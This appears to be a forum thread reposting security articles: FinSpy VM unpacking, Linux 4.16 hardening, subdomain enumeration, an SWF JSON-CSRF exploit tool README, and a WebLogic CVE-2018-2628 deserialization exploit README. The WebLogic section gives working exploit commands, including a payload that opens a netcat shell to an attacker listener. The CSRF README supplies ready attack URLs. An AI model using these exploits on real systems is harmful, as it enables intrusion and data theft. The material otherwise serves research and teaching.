A Walk-Through Tutorial, with Code, on Statically Unpacking the FinSpy VM: Part One, x86 Deobfuscation January 23, 2018 Rolf Rolles 1. Introduction Normally when I publish about breaking virtual machine software protections, I do so to present new techniques. Past examples have included: Writing an IDA processor module to unpack a VM Logging VM execution with DLL injection Compiler-based techniques to unpack commercial-grade VMs Abstract interpretation-based techniques to deobfuscate control flow Automated generation of peephole superdeobfuscators Program synthesis-based deobfuscation of metamorphic behavior in VM handlers Today's document has a different focus. I am not going to be showcasing any particularly new techniques. I will, instead, be providing a step-by-step walk-through of the process I used to analyze the FinSpy VM, including my thoughts along the way, the procedures and source code I used, and summaries of the notes I took. The interested reader is encouraged to obtain the sample and walk through the analysis process for themselves. I have three motives in publishing this document: I think it's in the best interest of the security defense community if every malware analyst is able to unpack the FinSpy malware VM whenever they encounter it (for obvious reasons). Reverse engineering is suffering from a drought of hands-on tutorial material in modern times. I was fortunate to begin reverse engineering when such tutorials were common, and they were invaluable in helping me learn the craft. Slides are fine for large analyses, but for smaller ones, let's bring back tutorials for the sake of those that have followed us. Publications on obfuscation, especially virtualization obfuscation, have become extremely abstruse particularly in the past five years. Many of these publications are largely inaccessible to those not well-versed in master's degree-level program analysis (or above). I want to demonstrate that easier techniques can still produce surprisingly fast and useful results for some contemporary obfuscation techniques. (If you want to learn more about program analysis-based approaches to deobfuscation, there is currently a public offering of my SMT-based program analysis training class, which has over 200 slides on modern deobfuscation with working, well-documented code.) Update: the rest of this document, the second and third parts, are now available online at the links just given. 2. Initial Steps The first thing I did upon learning that a new FinSpy sample with VM was publicly available was, of course, to obtain the sample. VirusTotal gave the SHA256 hash; and I obtained the corresponding sample from Hybrid-Analysis. The next step was to load the sample into IDA. The navigation bar immediately tipped me off that the binary was obfuscated: The first half of the .text section is mostly colored grey and red, indicating data and non-function code respectively. The second half of the .text section is grey in the navigation bar, indicating data turned into arrays. A normal binary would have a .text section that was mostly blue, indicating code within functions. 3. Analysis of WinMain: Suspicions of VM-Based Obfuscation IDA's auto-analysis feature identified that the binary was compiled by the Microsoft Visual C compiler. I began by identifying the WinMain function. Normally IDA would do this on my behalf, but the code at that location is obfuscated, so IDA did not name it or turn it into a function. I located WinMain by examining the ___tmainCRTStartup function from the Visual C Run-Time and finding where it called into user-written code. The first few instructions resembled a normal function prologue; from there, the obfuscation immediately began. .text:00406154 mov edi, edi ; Normal prologue .text:00406156 push ebp ; Normal prologue .text:00406157 mov ebp, esp ; Normal prologue .text:00406159 sub esp, 0C94h ; Normal prologue .text:0040615F push ebx ; Save registers #1 .text:00406160 push esi ; Save registers #1 .text:00406161 push edi ; Save registers #1 .text:00406162 push edi ; Save registers #2 .text:00406163 push edx ; Save registers #2 .text:00406164 mov edx, offset byte_415E41 ; Obfuscation - #1 .text:00406169 and edi, 0C946B9C3h ; Obfuscation - #2 .text:0040616F sub edi, [edx+184h] ; Obfuscation - #3 .text:00406175 imul edi, esp, 721D31h ; Obfuscation - #4 .text:0040617B stc ; Obfuscation .text:0040617C sub edi, [edx+0EEh] ; Obfuscation - #5 .text:00406182 shl edi, cl ; Obfuscation .text:00406184 sub edi, [edx+39h] ; Obfuscation - #6 .text:0040618A shl edi, cl ; Obfuscation .text:0040618C imul edi, ebp ; Obfuscation .text:0040618F mov edi, edi ; Obfuscation .text:00406191 stc ; Obfuscation .text:00406192 sub edi, 0A14686D0h ; Obfuscation ; ... obfuscation continues ... .text:004065A2 pop edx ; Restore registers .text:004065A3 pop edi ; Restore registers The obfuscation in the sequence above continues for several hundred instructions, nearly all of them consisting of random-looking modifications to the EDI register. I wanted to know A) whether the computations upon EDI were entirely immaterial junk instructions, or whether a real value was being produced by this sequence, and whether the memory references in the lines labeled #1, #3, #5, and #6 were meaningful. As for the first question, note that the values of the registers upon entering this sequence are unknown. We are, after all, in WinMain(), which uses the __cdecl calling convention, meaning that the caller did not pass arguments in registers. Therefore, the value computed on line #2 is unpredictable and can potentially change across different executions. Also, the value computed on line #4 is pure gibberish -- the value of the stack pointer will change across runs (and the modification to EDI overwrites the values computed on lines #1-#3). As for the second question, I skimmed the obfuscated listing and noticed that there were no writes to memory, only reads, all intertwined with gibberish instructions like the ones just described. Finally, the original value of edi is popped off the stack at the location near the end labeled "restore registers". So I was fairly confident that I was looking at a sequence of instructions meant to do nothing, producing no meaningful change to the state of the program. Following that was a short sequence: .text:004065A4 push 5A403Dh ; Obfuscation .text:004065A9 push ecx ; Obfuscation .text:004065AA sub ecx, ecx ; Obfuscation .text:004065AC pop ecx ; Obfuscation .text:004065AD jz loc_401950 ; Transfer control elsewhere .text:004065AD ; --------------------------------------------------------------------------- .text:004065B3 db 5 dup(0CCh) .text:004065B8 ; --------------------------------------------------------------------------- .text:004065B8 mov edi, edi .text:004065BA push ebp .text:004065BB mov ebp, esp .text:004065BD sub esp, 18h ; ... followed by similar obfuscation to what we saw above ... By inspection, this sequence just pushes the value 5A403Dh onto the stack, and transfers control to loc_401950. (The "sub ecx, ecx" instruction above sets the zero flag to 1, therefore the JZ instruction will always branch.) Next we see the directive "db 5 dup(0CCh)" followed by "mov edi, edi". Reverse engineers will recognize these sequences as the Microsoft Visual C compiler's implementation of hot-patching support. The details of hot-patching are less important than the observation that I expected that the original pre-obfuscated binary contained a function that began at the address of the first sequence, and ended before the "db 5 dup(0CCh)" sequence. I.e. I expect that the obfuscator disassembled all of the code within this function, replaced it with gibberish instructions, placed a branch at the end to some other location, and then did the same thing with the next function. This is a good sign that we're dealing with a virtualization-based obfuscator: namely, it looks like the binary was compiled with an ordinary compiler, then passed to a component that overwrote the original instructions (rather than merely encrypting them in-place, as would normal packers). 4. Learning More About the VM Entrypoint and VM Pre-Entry Recall again the second sequence of assembly code from the previous sequence: .text:004065A4 push 5A403Dh ; Obfuscation - #1 .text:004065A9 push ecx ; Obfuscation .text:004065AA sub ecx, ecx ; Obfuscation .text:004065AC pop ecx ; Obfuscation .text:004065AD jz loc_401950 ; Transfer control elsewhere Since -- by supposition -- all of the code from this function was replaced with gibberish, there wasn't much to meaningfully analyze. My only real option was to examine the code at the location loc_401950, the target of the JZ instruction on the last line. The first thing I noticed at this location, loc_401950, was that there were 125 incoming references, nearly all of them of the form "jz loc_401950", with some of the form "jmp loc_401950". Having analyzed a number of VM-based obfuscators in my day, this location fits the pattern of being the part of the VM known as the "entrypoint" -- the part where the virtual CPU begins to execute. Usually this location will save the registers and flags onto the stack, before performing any necessary setup, and finally beginning to execute VM instructions. VM entrypoints usually require a pointer or other identifier to the bytecode that will be executed by the VM; maybe that's the value from the instruction labeled #1 in the sequence above? Let's check another incoming reference to that location to verify: .text:00408AB8 push 5A7440h ; #2 .text:00408ABD push eax .text:00408ABE sub eax, eax .text:00408AC0 pop eax .text:00408AC1 jz loc_401950 The other location leading to the entrypoint is functionally identical, apart from pushing a different value onto the stack. This value is not a pointer; it does not correspond to an address within the executable's memory image. Nevertheless, we expect that this value is somehow responsible for telling the VM entrypoint where the bytecode is located. 5. Analyzing the VM Entrypoint Code So far we have determined that loc_401950 is the VM entrypoint, targeted by 125 branching locations within the binary, which each push a different non-pointer DWORD before branching. Let's start analyzing that code: .text:00401950 loc_401950: .text:00401950 0F 82 D1 02 00 00 jb loc_401C27 .text:00401956 0F 83 CB 02 00 00 jnb loc_401C27 Immediately we see an obvious and well-known form of obfuscation. The first line jumps to loc_401C27 if the "below" conditional is true, and the second line jumps to loc_401C27 if the "not below" conditional is true. I.e., execution will reach loc_401C27 if either "below" or "not below" is true in the current EFLAGS context. I.e., these two instructions will transfer control to loc_401C27 no matter what is in EFLAGS -- and in particular, we might as well replace these two instructions with "jmp loc_401C27", as the effect would be identical. Continuing to analyze at loc_401C27, we see another instance of the same basic idea: .text:00401C27 loc_401C27: .text:00401C27 77 CD ja short loc_401BF6 .text:00401C29 76 CB jbe short loc_401BF6 Here we have an unconditional branch to loc_401BF6, split across two instructions -- a "jump if above", and "jump if below or equals", where "above" and "below or equals" are logically opposite and mutually exclusive conditions. After this, at location loc_401BF6, there is a legitimate-looking instruction (push eax), followed by another conditional jump pair to loc_401D5C. At that location, there is another legitimate-looking instruction (push ecx), followed by a conditional jump pair to loc_4019D2. At that location, there is another legitimate-looking instruction (push edx), followed by another conditional jump pair. It quickly became obvious that every legitimate instruction was interspersed between one or two conditional jump pairs -- there are hundreds or thousands of these pairs throughout the binary. Though an extremely old and not particularly sophisticated form of obfuscation, it is nevertheless annoying and degrades the utility of one's disassembler. As I discussed in a previous entry on IDA processor module extensions, IDA does not automatically recognize that two opposite conditional branches to the same location are an unconditional branch to that location. As a result, IDA thinks that the address following the second conditional branch must necessarily contain code. Obfuscation authors exploit this by putting junk bytes after the second conditional branch, which then causes the disassembler to generate garbage instructions, which may overlap and occlude legitimate instructions following the branch due to the variable-length encoding scheme for X86. (Note that IDA is not to blame for this conundrum -- ultimately these problems are undecidable under ordinary Von Neumann-based models of program execution.) The result is that many of the legitimate instructions get lost in the dreck generated by this process, and that, in order to follow the code as usual in manual static analysis, one would spend a lot of time manually undefining the gibberish instructions and re-defining the legitimate ones. 6. Deobfuscating the Conditional Branch Obfuscation: Theory and Practice Manually undefining and redefining instructions as just described, however, would be a waste of time, so let's not do that. Speaking of IDA processor modules, once it became clear that this pattern repeated between every legitimate non-control-flow instruction, I got the idea to write an IDA processor module extension to remove the obfuscation automatically. IDA processor module extensions give us the ability to have a function of ours called every time the disassembler encounters an instruction. If we could recognize that the instruction we were disassembling was a conditional branch, and determine that the following instruction contains its opposite conditional branch to the same target as the first, we could replace the first one with an unconditional branch and NOP out the second branch instruction. Thus, the first task is to come up with a way to recognize instances of this obfuscation. It seemed like the easiest way would be to do this with byte pattern-recognition. In my callback function that executes before an instruction is disassembled, I can inspect the raw bytes to determine whether I'm dealing with a conditional branch, and if so, what the condition is and the branch target. Then I can apply the same logic to determine whether the following instruction is a conditional branch and determine its condition and target. If the conditions are opposite and the branch targets are the same, we've found an instance of the obfuscation and can neutralize it. In practice, this is even easier than it sounds! Recall the first example from above, reproduced here for ease of reading: .text:00401950 0F 82 D1 02 00 00 jb loc_401C27 .text:00401956 0F 83 CB 02 00 00 jnb loc_401C27 Each of these two instructions is six bytes long. They both begin with the byte 0F (the x86 two-byte escape opcode stem), are then followed by a byte in the range of 80 to 8F, and are then followed by a DWORD encoding the displacement from the end of the instructions to the branch targets. As a fortuitous quirk of x86 instruction encodings, opposite conditional branches are encoded with adjacent bytes. I.e. 82 represents the long form of JB, and 83 represents the long form of JNB. Two long branches have opposite condition codes if and only if their second opcode byte differs from one another in the lowest bit (i.e. 0x82 ^ 0x83 == 0x01). And note also that the DWORDs following the second opcode byte differ by exactly 6 -- the length of a long conditional branch instruction. That's all we need to know for the long conditional branches. There is also a short form for conditionals, shown in the second example above and reproduced here for ease of reading: .text:00401C27 77 CD ja short loc_401BF6 .text:00401C29 76 CB jbe short loc_401BF6 Virtually identical comments apply to these sequences. The first bytes of both instructions are in the range of 0x70 to 0x7F, opposite conditions have differing lowest bits, and the second bytes differ from one another by exactly 2 -- the length of a short conditional branch instruction. 7. Deobfuscating the Conditional Branch Obfuscation: Implementation I started by copying and pasting my code from the last time I did something like this. I first deleted all the code that was specific to the last protection I broke with an IDA processor module extension. Since I've switched to IDA 7.0 in the meantime, and since IDA 7.0 made breaking changes vis-a-vis prior APIs, I had to make a few modifications -- namely, renaming the custom analysis function from deobX86Hook::custom_ana(self) to deobX86Hook::ev_ana_insn(self, insn), and replacing every reference to idaapi.cmd.ea with insn.ea. Also, my previous example would only run if the binary's MD5 matched a particular sum, so I copied and pasted the sum of my sample out of IDA's database preamble over the previous MD5. From there I had to change the logic in custom_ana. The result was even simpler than my last processor module extension. Here is the logic for recognizing and deobfuscating the short form of the conditional branch obfuscation: b1 = idaapi.get_byte(insn.ea) if b1 >= 0x70 and b1 <= 0x7F: d1 = idaapi.get_byte(insn.ea+1) b2 = idaapi.get_byte(insn.ea+2) d2 = idaapi.get_byte(insn.ea+3) if b2 == b1 ^ 0x01 and d1-2 == d2: # Replace first byte of first conditional with 0xEB, the opcode for "JMP rel8" idaapi.put_byte(insn.ea, 0xEB) # Replace the following instruction with two 0x90 NOP instructions idaapi.put_word(insn.ea+2, 0x9090) Deobfuscating the long form is nearly identical; see the code for details. 8. Admiring My Handiwork, Cleaning up the Database a Bit Now I copied the processor module extension to %IDA%\plugins and re-loaded the sample. It had worked! The VM entrypoint had been replaced with: .text:00401950 loc_401950: .text:00401950 jmp loc_401C27 Though the navigation bar was still largely red and ugly, I immediately noticed a large function in the middle of the text section: Looking at it in graph mode, we can see that it's kind of ugly and not entirely as nice as analyzing unobfuscated X86, but considering how trivial it was to get here, I'll take it over the obfuscated version any day. The red nodes denote errant instructions physically located above the valid ones in the white nodes. IDA's graphing algorithm includes any code within the physically contiguous region of a function's chunks in the graph display, regardless of whether they have incoming code cross-references, likely to make displays of exception handlers nicer. It would be easy enough to remove these and strip the JMP instructions if you wanted to write a plugin to do so. Next I was curious about the grey areas in the .text section navigation bar held. (Those areas denote defined data items, mixed in with the obfuscated code in the .text section.) I figured that the data held there was most likely related to the obfuscator. I spent a minute looking at the grey regions and found this immediately after the defined function: .text:00402AE0 dd offset loc_402CF2 .text:00402AE4 dd offset loc_402FBE ; ... 30 similar lines deleted ... .text:00402B60 dd offset loc_4042DC .text:00402B64 dd offset loc_40434D 34 offsets, each of which contains code. Those are probably the VM instruction handlers. For good measure, let's turn those into functions with an IDAPython one-liner: for pFuncEa in xrange(0x00402AE0, 0x00402B68, 4): idaapi.add_func(idaapi.get_long(pFuncEa)) Now a large, contiguous chunk of the navigation bar for the .text section is blue. And at this point I realized I had forgotten to create a function at the original dispatcher location, so I did that manually and here was the resulting navigation bar: Hex-Rays doesn't do a very good job with any of the functions we just defined, since they were originally written in assembly language and use instructions and constructs not ordinarily produced by compilers. I don't blame Hex-Rays for that and I hope they continue to optimize for standard compiler-based use cases and not weird ones like this. Lastly, I held PageDown scrolling through the text section to see what was left. The majority of it was VM entrypoints like those we saw in section 3. There were a few functions that appeared like they had been produced by a compiler. So now we have assessed what's in the text section -- a VM with 34 handlers, 125+ virtualized functions, and a handful of unvirtualized ones. Next time we'll take a look at the VM. 9. Preview of Parts 2 and 3, and Beyond After this I spent a few hours analyzing the VM entrypoint and VM instruction handlers. Next, through static analysis I obtained the bytecode for the VM program contained within this sample. I then wrote a disassembler for the VM. That's part two. From there, by staring at the disassembled VM bytecode I was able to write a simple pattern-based deobfuscator. After that I re-generated the X86 machine code, which was not extremely difficult, but it was more laborious than I had originally anticipated. That's part three. After that, I re-inserted the X86 machine code into the original binary and analyzed it. It turned out to be a fairly sophisticated dropper for one of two second-stage binaries. It was fairly heavy on system internals and had a few tricks that aren't widely documented, so I may publish one or more of those as separate entries, and/or I may publish an analysis of the entire dropper. Finally, I analyzed -- or rather, still am analyzing -- the second-stage binaries. They may or may not prove worthy of publication. Sursa: http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation
-
April 12, 2018 security things in Linux v4.16 Filed under: Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 5:04 pm Previously: v4.15  Linux kernel v4.16 was released last week. I really should write these posts in advance, otherwise I get distracted by the merge window. Regardless, here are some of the security things I think are interesting: KPTI on arm64 Will Deacon, Catalin Marinas, and several other folks brought Kernel Page Table Isolation (via CONFIG_UNMAP_KERNEL_AT_EL0) to arm64. While most ARMv8+ CPUs were not vulnerable to the primary Meltdown flaw, the Cortex-A75 does need KPTI to be safe from memory content leaks. It’s worth noting, though, that KPTI does protect other ARMv8+ CPU models from having privileged register contents exposed. So, whatever your threat model, it’s very nice to have this clean isolation between kernel and userspace page tables for all ARMv8+ CPUs. hardened usercopy whitelisting While whole-object bounds checking was implemented in CONFIG_HARDENED_USERCOPY already, David Windsor and I finished another part of the porting work of grsecurity’s PAX_USERCOPY protection: usercopy whitelisting. This further tightens the scope of slab allocations that can be copied to/from userspace. Now, instead of allowing all objects in slab memory to be copied, only the whitelisted areas (where a subsystem has specifically marked the memory region allowed) can be copied. For example, only the auxv array out of the larger mm_struct. As mentioned in the first commit from the series, this reduces the scope of slab memory that could be copied out of the kernel in the face of a bug to under 15%. As can be seen, one area of work remaining are the kmalloc regions. Those are regularly used for copying things in and out of userspace, but they’re also used for small simple allocations that aren’t meant to be exposed to userspace. Working to separate these kmalloc users needs some careful auditing Total Slab Memory: 48074720 Usercopyable Memory: 6367532 13.2% task_struct 0.2% 4480/1630720 RAW 0.3% 300/96000 RAWv6 2.1% 1408/64768 ext4_inode_cache 3.0% 269760/8740224 dentry 11.1% 585984/5273856 mm_struct 29.1% 54912/188448 kmalloc-8 100.0% 24576/24576 kmalloc-16 100.0% 28672/28672 kmalloc-32 100.0% 81920/81920 kmalloc-192 100.0% 96768/96768 kmalloc-128 100.0% 143360/143360 names_cache 100.0% 163840/163840 kmalloc-64 100.0% 167936/167936 kmalloc-256 100.0% 339968/339968 kmalloc-512 100.0% 350720/350720 kmalloc-96 100.0% 455616/455616 kmalloc-8192 100.0% 655360/655360 kmalloc-1024 100.0% 812032/812032 kmalloc-4096 100.0% 819200/819200 kmalloc-2048 100.0% 1310720/1310720 This series took quite a while to land (you can see David’s original patch date as back in June of last year). Partly this was due to having to spend a lot of time researching the code paths so that each whitelist could be explained for commit logs, partly due to making various adjustments from maintainer feedback, and partly due to the short merge window in v4.15 (when it was originally proposed for merging) combined with some last-minute glitches that made Linus nervous. After baking in linux-next for almost two full development cycles, it finally landed. (Though be sure to disable CONFIG_HARDENED_USERCOPY_FALLBACK to gain enforcement of the whitelists — by default it only warns and falls back to the full-object checking.) automatic stack-protector While the stack-protector features of the kernel have existed for quite some time, it has never been enabled by default. This was mainly due to needing to evaluate compiler support for the feature, and Kconfig didn’t have a way to check the compiler features before offering CONFIG_* options. As a defense technology, the stack protector is pretty mature. Having it on by default would have greatly reduced the impact of things like the BlueBorne attack (CVE-2017-1000251), as fewer systems would have lacked the defense. After spending quite a bit of time fighting with ancient compiler versions (*cough*GCC 4.4.4*cough*), I landed CONFIG_CC_STACKPROTECTOR_AUTO, which is default on, and tries to use the stack protector if it is available. The implementation of the solution, however, did not please Linus, though he allowed it to be merged. In the future, Kconfig will gain the knowledge to make better decisions which lets the kernel expose the availability of (the now default) stack protector directly in Kconfig, rather than depending on rather ugly Makefile hacks. That’s it for now; let me know if you think I should add anything! The v4.17 merge window is open. Edit: added details on ARM register leaks, thanks to Daniel Micay. © 2018, Kees Cook. Sursa: https://outflux.net/blog/archives/2018/04/12/security-things-in-linux-v4-16/
-
In our presentation, we will tell how we detected and exploited the vulnerability (explained in this Briefing: https://youtu.be/mYsTBPqbya8), and bypassed built-in protection mechanisms. By Maxim Goryachy & Mark Ermolov Full Abstract & Presentation Materials: https://www.blackhat.com/eu-17/briefi...
-
- 1
-
-
Purpose This repository was created to simplify the SWF-based JSON CSRF exploitation. It should work also with XML (and any other) data using optional parameters. Also it can be used for easy exploitation of crossdomain.xml misconfiguration (no need to compile .swf for each case). Variations of target configuration Target site has no crossdomain.xml, or secure crossdomain.xml, not allowing domains you can control. In this case you can't get the response from target site, but still can conduct CSRF attacks with arbitrary Content-Type header, if CSRF protection relies only on the content-type (e.g. checking it for being specific type). In this case usage of 307 redirect is required, to bypass crossdomain.xml (it will be requested only after the csrf will take place). Target site has misconfigured crossdomain.xml, allowing domains you can control. In this case you can conduct both CSRF and response reading attacks. Usage of 307 redirect is not required. Instructions The .swf file take 3 required and 2 optional parameters: jsonData - apparently, JSON Data:) Can be other type of data, if optional ct param specified. Can be empty php_url - URL of the 307 redirector php file. Can be empty (in this case SWF will request endpoint without 307 redirect - and likely will fail, if crossdomain.xml is secure, or not exist) endpoint - target endpoint, which is vulnerable to CSRF, or, if you're exploiting insecure crossdomain.xml, URL which response you want to read. ct (optional) - specify your own Content-Type. Without this parameter it will be application/json reqmethod (optional) - specify your own request method. Without this parameter it will be POST Place test.swf and test.php on your host, then simply call the SWF file with the correct parameters. (As mentioned by @ziyaxanalbeniz) - we actually don't need crossdomain.xml from this repo, if test.php and test.swf are on same domain). Place it on your host if you also testing locally or across different domains. Example call: http[s]://[yourhost-and-path]/test.swf?jsonData=[yourJSON]&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=http[s]://[targethost-and-endpoint] e.g. https://example.com/test.swf?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint Using HTML wrapper (read.html) with test.swf (if browser does not allow direct connection to .swf), parameters are same: https://example.com/read.html?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint In case your target has crossdomain.xml misconfigured, or allowing your domain, you will also get the response using this wrapper. In this case you can use wrapper without 307 redirect (no need of php_url parameter). This is useful for Chrome >=62, where you can't access SWF directly, or if you want to exploit insecure crossdomain.xml. Note: if you are exploiting insecure crossdomain.xml, if the target site uses https, your origin should also use https for successful response reading. If you have the questions regarding this repository - ping me in the Twitter: @h1_sp1d3r Example cases (CSRF) Exploit JSON CSRF, POST-based, 307 redirect: https://example.com/read.html?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint Exploit XML CSRF, POST-based, 307 redirect: https://example.com/read.html?jsonData=[xmldada]&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint&ct=application/xml Example cases (read responses using insecure crossdomain.xml) Exploit insecure crossdomain.xml (read data from target), GET-based, no 307 redirect: https://example.com/read.html?jsonData=&endpoint=https://sometargethost.com/endpoint&reqmethod=GET Exploit insecure crossdomain.xml (read data from target), POST-based, any content-type supported, no 307 redirect: https://example.com/read.html?jsonData=somedata&endpoint=https://sometargethost.com/endpoint&ct=text/html Updates Starting with Chrome 62, direct link to SWF file may not work. If this behavior happens, use HTML wrapper. 01.01.2018 - added HTML wrapper (read.html, should be used with test.swf) for better experience with Chrome. Usage and parameters are same as in case with test.swf. It supports also insecure crossdomain.xml exploitation (able to show the response from the target endpoint). 25.03.2018 - added UI wrapper for better experience (ui.html + assets folder) Cross Browser Testing This project is tested on following browsers as follows: Notes: ✓ - Works, X - doesn't work Thanks Special thanks to the @emgeekboy, who inspired me to make this repository and most functionality, and @hivarekarpranav, who did the cross-browser and request methods research. Related blog posts about this: http://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/ http://research.rootme.in/forging-content-type-header-with-flash/ http://resources.infosecinstitute.com/bypassing-csrf-protections-fun-profit/#gref https://medium.com/@know.0nix/bypassing-crossdomain-policy-and-hit-hundreds-of-top-alexa-sites-af1944f6bbf5 - thanks to the @knowledge_2014, who inspired me to implement the response reading component Disclaimer This repository is made for educational and ethical testing purposes only. Usage for attacking targets without prior mutual consent is illegal. By using this testing tool you accept the fact that any damage (dataleak, system compromise, etc.) caused by the use of this tool is your responsibility. FAQ Can we read response from server? Answer: no. Because of SOP. Still, if crossdomain.xml on the target host exist, and misconfigured - in this case yes. Does it work with requests other than GET/POST? Answer: no. Does it possible to craft custom headers like X-Requested-With, Origin or Referrer? Answer: no (it was possible in the past, but not now). Commits, PRs and bug reports are welcome! Sursa: https://github.com/sp1d3r/swf_json_csrf
-
The Connected Car 1. Introduction Our world is becoming more and more digital, and the devices we use daily are becoming connected more and more. Thinking of IoT products in domotics and healthcare, it’s easy to find countless examples of how this interconnectedness improves our quality of life. However, these rapid changes also pose risks. In the big rush forward, we as a society aren’t always too concerned with these risks until they manifest themselves. This is where the hacker communi ty has taken an important role in the past decades: using curiosity and skills to demonstrate that the changes in the name of progress sometimes have a downside that we need to consider: Download: https://www.computest.nl/wp-content/uploads/2018/04/connected-car-rapport.pdf
-
Subdomain enumeration April 21, 2018 A friend recently asked me what methods I use to find subdomains. To be honest I was confused, like “oooohhh so much, brute force mmm… zone transfer and… brute for… wait Google and mmm… many other tools!” What a shame that I was so inaccurate after so much time spent to look for subdomains. Time to dig a little bit! After I wrote a list of the most popular methods, I tried to make a list of some tools and online resources to exploit them. Of course this list is far from exhaustive, there are many new stuff every day, but it’s still a good start Methods Brute force The easiest way. Try millions and millions words as subdomains and check which ones are alive with a forward DNS request. Zone transfer aka AXFR Zone transfer is a mechanism that administrators can use to replicate DNS databases but sometimes the DNS is not well configured and this operation is allowed by anyone, revealing all subdomains configured. DNS cache snooping DNS cache snooping is a specific way to query a DNS server in order to check if a record exists in his cache. Reverse DNS Try to find the domain name associated with an IP address, it’s the opposite of Forward DNS. Alternative names Once the first round of your recon is finished, apply permutations and transformations (based on another wordlist maybe?) to all subdomains discovered in order to find new ones. Online DNS tools There are many websites that allow to query DNS databases and their history. SSL Certificates Request informations about all certificates linked to a specific domain, and obtain a list of subdomains covered by these certificates. Search engines Search for a specific domain in your favourite search engine then minus the discovered sudomains one by one site:example.com -www -dev Technical tools/search engines More and more companies host their code online on public platform, most of the time these services have a search bar. Text parsing Parse the HTML code of a website to find new subdomains, this can be applied to every resources of the company, office documents as well. VHost discovery Try to find any other subdomain configured on the same web server by brute forcing the Host header. Tools Altdns: alternative names brute forcing Amass: brute force, Google, VirusTotal, alt names aquatone-discover: Brute force, Riddler, PassiveTotal, Threat Crowd, Google, VirusTotal, Shodan, SSL Certificates, Netcraft, HackerTarget, DNSDB BiLE-suite: HTML parsing, alt names, reverse DNS blacksheepwall: AXFR, brute force, reverse DNS, Censys, Yandex, Bing, Shodan, Logontube, SSL Certificates, Virus Total Bluto: AXFR, netcraft, brute force brutesubs: enumall, Sublist3r, Altdns cloudflare_enum: Cloudflare DNS CTFR: SSL Certificates DNS-Discovery: brute force DNS Parallel Prober: DNS resolver dnscan: AXFR, brute force dnsrecon: AXFR, brute force, reverse DNS, snoop caching, Google dnssearch: brute force domained: Sublist3r, enumall, Knockpy, SubBrute, MassDNS, recon-ng enumall: recon-ng -> Google, Bing, Baidu, Netcraft, brute force Fierce: AXFR, brute force, reverse DNS Knockpy: AXFR, virustotal, brute force MassDNS: DNS resolver Second Order: HTML parsing Sonar: AXFR, brute force SubBrute: brute force Sublist3r: Baidu, Yahoo, Google, Bing, Ask, Netcraft, DNSdumpster, VirusTotal, Threat Crowd, SSL Certificates, PassiveDNS theHarvester: reverse DNS, brute force, Google, Bing, Dogpile, Yahoo, Baidu, Shodan, Exalead TXDNS: alt names (typo/tld) vhost-brute: vhost discovery VHostScan: vhost discovery virtual-host-discovery: vhost discovery Online DNS tools https://hackertarget.com/ http://searchdns.netcraft.com/ https://dnsdumpster.com/ https://www.threatcrowd.org/ https://riddler.io/ https://api.passivetotal.org https://www.censys.io https://api.shodan.io http://www.dnsdb.org/f/ https://www.dnsdb.info/ https://scans.io/ https://findsubdomains.com/ https://securitytrails.com/dns-trails https://crt.sh/ https://certspotter.com/api/v0/certs?domain=example.com https://transparencyreport.google.com/https/certificates https://developers.facebook.com/tools/ct Search engines http://www.baidu.com/ http://www.yahoo.com/ http://www.google.com/ http://www.bing.com/ https://www.yandex.ru/ https://www.exalead.com/search/ http://www.dogpile.com/ https://www.zoomeye.org/ https://fofa.so/ Technical tools/search engines https://github.com/ https://gitlab.com/ https://www.virustotal.com/fr/ DNS cache snooping nslookup -norecursive domain.com nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={domain1,domain2,domain3}' <ip> Others online resources https://ask.fm/ http://logontube.com/ http://commoncrawl.org/ http://www.sitedossier.com/ Sursa: http://10degres.net/subdomain-enumeration/
-
- 1
-
-
IMPORTANT: Is provided only for educational or information purposes. Description April 17, 2018, Oracle fixed a deserialization Remote Command Execution vulnerability (CVE-2018-2628) on Weblogic server WLS Core Components . Vulnerable: 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 Environment Run below commands to create a vulnerable Weblogic server (10.3.6.0): docker pull zhiqzhao/ubuntu_weblogic1036_domain docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain Reproduce Steps Run below commands on JRMPListener host: wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command] e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040' Start a listener on attacker host: nc -nlvp 4040 Run exploit script on attacker host: wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient] e.g. a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry) b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator) Reference http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html Sursa: https://github.com/brianwrf/CVE-2018-2628
-
